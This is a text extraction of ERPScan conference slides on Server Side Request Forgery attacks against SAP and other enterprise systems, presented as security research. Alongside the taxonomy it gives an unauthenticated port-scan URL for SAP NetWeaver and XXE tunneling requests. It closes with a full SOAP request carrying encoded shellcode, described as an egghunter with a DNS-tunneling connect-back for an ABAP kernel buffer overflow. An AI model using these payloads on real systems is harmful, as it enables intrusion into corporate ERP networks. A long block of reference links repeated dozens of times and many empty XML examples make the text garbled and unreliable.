invest in security - erpscan • ssrfsocks by iamultra: a tool for erpscan’svulnerability in...

Invest in securityto secure investments

SSRF VS. BUSINESS-CRITICAL APPLICATIONSPART 2: NEW VECTORS AND CONNECT-BACK ATTACKS

Alexander Polyakov CTO at ERPScan

Alexander Polyakov

Business application security expert

ERPScan

Leading SAP AG partner in the field of discovering security vulnerabilities by the number of found vulnerabilities

Developers of ERPScan Security Scanner for SAP

Leader by the number of acknowledgements from SAP ( >60 )

Invited to talk at more than 30 key security conferencesworldwide (BlackHat (US/EU/DC/UAE), RSA, Defcon, HITB)

First to release software for NetWeaver J2EE platform assessment

Research team with experience in different areas of security fromERP and web security to mobile, embedded devices, and criticalinfrastructure, accumulating their knowledge in SAP research.

Conducted workshops for SAP

Agenda

Enterprise applications SSRF

History Types

SSRF Proxy attacks Example of Attacking SAP with SSRF

SSRF Connect-back attacks Examples

XXE Scanner Conclusion

Enterprise applications: Definitions

Business software is generally any software that helps businessto increase its efficiency or measure its performance

Small (MS Office)

Medium (CRM, Shops)

Enterprise (ERP, BW)

Why are they critical?

Any information an attacker might want, be it a cybercriminal,industrial spy or competitor, is stored in corporate ERP. Thisinformation can include financial, customer or public relations,intellectual property, personally identifiable information andmore. Industrial espionage, sabotage, and fraud or insiderembezzlement may be very effective if targeted at the victimsERP system, and they can cause significant damage to thebusiness.

Business-critical systems architecture

Located in a secure subnetwork

Secured by firewalls

Monitored by IDS systems

Regularly patched

Noahhh

But lets assume that they are,because it will be much more

interesting to attack them

Secure corporate network

The

Internet

Industrial network

ERP network

Corporate network

But wait.There must be some links!

Real corporate network

The

Internet Industrial network

ERP network

Corporate network

AndAttackers can use them!

Corporate network attack scenario

The

Internet Industrial network

ERP network

Corporate network

But how?

SSRF History: the beginning

SSRF: Server Side Request Forgery.

An attack which was discussed in 2008 with very little information about theory and practical examples.

Like any new term, SSRF doesnt show us something completely new like a new type of vulnerability. SSRF-style attacks were known before.

SSRF History: Basics

We send Packet A to Service A

Service A initiates Packet B to service B

Services can be on the same host or on different hosts

We can manipulate some fields of packet B within packet A

Various SSRF attacks depend on how many fields we can control in packet B

Packet A

Packet B

SSRF history

DeralHeiland Shmoocon 2008

Web Portals Gateway To Information Or A Hole In Our Perimeter Defenses

Spiderlabs 2012

http://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.html

Vorontsov 2012

SSRF via XXE http://2012.caro.org/presentations/attacks-on-large-modern-web-applications

ERPScan (Polyakov,Chastuchin) - SSRF vs business critical applications (Gopher protocol) 2012 august

http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdf

ssrfsocks by iamultra: a tool for ERPScans vulnerability in Gopher

https://github.com/iamultra/ssrfsocks 2012 august

Less Known Web App Vulnerabilities: Real World Examples. (From ERPScan paper) 2012 October

ERPScan - Gopher SSRF in JVM advisory October 2012 http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/

ERPScan (Polyakov) - SSRF 2.0 http://erpscan.com/category/publications/

New research will be published at ZeroNights http://2012.zeronights.org/

http://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttp://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/

Ideal SSRF

The idea is to find victim server interfaces that will allowsending packets initiated by the victim server to the localhostinterface of the victim server or to another server secured by afirewall from outside. Ideally, this interface :

Must allow sending any packet to any host and any port

Must be accessed remotely without authentication

Why?

In this research, we wanted to :

Collect the information about SSRF attacks

Categorize them

Show examples of SSRF attacks

Show new potential and real SSRF vectors

SSRF

Trusted SSRFRemote

SSRF

SSRF proxy attack SSRF back connect

SSRF counter attack

Local SSRF

Simp

le

Partial

Full

SSRF proxy attack

Secure network

Corporate network

Packet BPacket BPacket A

SSRF back connect attack

Packet B

Packet C

Packet BPacket A

SSRF proxy attacks

Trusted SSRF (Can forge requests to remote services butonly to predefined ones)

Remote SSRF (Can forge requests to any remote IP andport)

Simple Remote SSRF (No control on app level)

Partial Remote SSRF (Control in some fields of app level)

Full Remote SSRF (Control on app level)

Exploiting SSRF

For every SSRF attack, there must be at least 2 vulnerabilities to successfully trigger the attack:

First vulnerability Functionality to create/use links (for trusted SSRF)

Functionality in some service on Server A which allows us to send remote packets (for other types of SSRF)

Second vulnerability Insecure link (for trusted SSRF)

Vuln. in service on server B (for remote SSRF )

Vuln. in localhost service on server A (for local SSRF)

Vuln. in client app. on server A (for back-connect SSRF)

Trusted SSRF

Trusted SSRF in Oracle

SELECT * FROM myTable@HostB

EXECUTE Schema.Package.Procedure('Parameter')@HostB

Trusted SSRF in MSSQL

Select * from openquery(HostB,'select * from @@version')]

Trusted SSRF in SAP NetWeaver

SM59 transaction

Also Lotus Domino and others

Not so interesting

First vulnerability (functionality on Server A)

Unusual calls

Multiprotocol calls (URI) In engines (XML)

In applications

UNC calls

HTTP calls

FTP calls

LDAP calls

SSH calls

Other calls

Functionality on server A: Unusual calls

Remote port scan

SAP NetWeaver wsnavigator (sapnote 1394544,871394)

SAP NetWeaver ipcpricing (sapnote 1545883)

SAP BusinessObjects viewrpt (sapnote 1583610)

Remote password bruteforce

SAP NetWeaver (NDA)

Other

Information disclosure by testing if a file or a directory exists

Timing attacks

Etc????

Very application-specific. Can be very interesting

Example of unusual calls

It is possible to scan internal network from the Internet

Authentication is not required

SAP NetWeaver J2EE engine is vulnerable

/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13

& port=31337

& dispatcher=

& targetClient=

& view=

Port scan via ipcpricing JSP

Host is not alive

Port closed

HTTP port

SAP port

Multiprotocol calls (in XML)

XML seems to be the new TCP.

Almost all big projects use XML-based data transfer.

There are a lot of XML-based protocols with different options tocall external resources and thus conduct SSRF attacks.

There is at least one element type which fits almost all XML-based schemes. The type is: xsd:anyURI.

URIs also encompass URLs of other schemes (e.g., FTP, gopher,telnet), as well as URNs.

Popular URIs: http:// ftp:// telnet:// ..

Multiprotocol calls in XML

XML XML External Entity XSD definition

XML Encryption XML Signature WS-Policy From WS-Security WS-Addressing XBRL ODATA (edmx)

ODATA External Entity Other

BPEL STRATML

XML Encryption

1.

2.

3.

4.

Successfully Tested

XML Signature

1.

Successfully Tested

WS-Addressing

1.

http://ServerB/

2. http://ServerB/

Successfully Tested (0-day)

WS-Policy

1.

Not Tested

WS-Security

1.

WS-Federation

1.

2. http://ServerB/

3. http://ServerB/

4.

http://ServerB/

Not Tested

XBRL

1.

2.

Not Tested

ODATA (edmx)

The edmx:Reference element specifies external entity models referenced by this EDMX. Referenced models are available in their entirety to referencing models. All entity types, complex types and other named elements in a referenced model can be accessed from a referencing model.

http://www.odata.org/media/30002/OData%20CSDL%20Definition.html

No examples of edmx in the wild (new protocol)

http://www.odata.org/media/30002/OData CSDL Definition.html

ODATA

1.

2.

Still no products for testing (0-day)

STRATML

1. http://ServerB/

Not tested

SOAP

SoapAction?

No Examples

Multiprotocol Calls in Applications

Multiprotocol calls

Not so usual but a potentially big area

Oracle Database

UTL_TCP

UNC calls: threats

Sure you can call UNC path if you have a universal URI

But if there is no universal engine you can search for UNC

UNC calls can be used for:

conducting SMBRelay attack

reading files from shared folders (open or trusted)

other vectors which will be discussed later.

Check SMBRelay bible posts from http://erpscan.com/?s=SMBRelay+Bible&x=0&y=0

http://erpscan.com/?s=SMBRelay+Bible&x=0&y=0

UNC calls: applications

SAP NetWeaver

From SAP webservices (sapnote 1503579,1498575)

From RFC functions (sapnote 1554030)

From SAP transactions, reports (sapnote 1583286)

Oracle Database

Listener

Database commands such as ctxsys.context

MsSQL Database

MySQL Database

FTP servers

IBM Lotus Domino controller

VMWare

Anything that uses XML engine

And much more

HTTP calls: threats

Sure you can call HTTP path if you have a universal URI

But if there is no universal engine, you can search for HTTP

HTTP calls can be used for conducting wide range of attacks on systems which are in one network with Server A

DoS

Inf disclosure

Unauthorized access (like invoker servlets)

Bruteforcing (users/directories/pages)

Fingerprinting

etc

Examples of HTTP attacks are beyond the current research

HTTP calls: applications

SAP NetWeaver

Transactions

Reports

RFC commands

Portal portlets

Portal links

Oracle Database

UTL_HTTP

MsSQL Database

PostgreSQL Database


And much more

FTP calls threats

Sure you can call FTP path if you have a universal URI

FTP is usually possible whenever HTTP is possible

But if there is no universal engine, you can search for FTP

FTP calls can be used to conduct wide range of attacks on systems which are in one network with Server A

DoS

Inf disclosure

Unauthorized access (like invoker servlets)

Bruteforcing (users/directories/pages)

Fingerprinting

etc.

Examples of FTP attacks are beyond the current research

FTP calls: applications

SAP NetWeaver

Transactions

Reports

RFC commands

Oracle Database

UTL_HTTP

PostgreSQL Database


And much more

Other calls

ldap:// Bruteforce logins

Information disclosure

jar:// Information disclosure

mailto:

ssh2:// Bruteforce logins

Rce?

gopher:// XXE Tunneling

.

Just the most popular ones

Exploiting Gopher (Example)

XXE Tunneling (Example)

Server B (ERP, HR, BW etc.)

Server A (Portal or XI)

192.168.0.1

172.16.0.1

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1Host: 192.168.0.1:8000

XXE Tunneling to Buffer Overflow (Example)

A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in sapnote 1487330)

Hard to exploit because it requires calling an RFC function which calls Kernel function

But even such a complex attack can be exploited

Get ready for the hardcore

XXE Tunneling to Buffer Overflow (Hint 1)

Shellcode size is limited to 255 bytes (name parameter)

As we dont have direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back

But the XML engine saves some XML data in RWX memory

So we can use egghunter

Any shellcode can be uploaded

XXE Tunneling to Buffer Overflow: Packet B

POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1Authorization: Basic U1FQKjowMjA3NTk3==Host: company.com:80User-Agent: ERPSCAN Pentesting tool v 0.2Content-Type: text/xml; charset=utf-8Cookie: sap-client=000Content-Length: 2271

dsecdsechffffk4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4M3O4o8M4q0F3417005O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4s1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa

invest in security - erpscan • ssrfsocks by iamultra: a tool for erpscan’svulnerability in...

Documents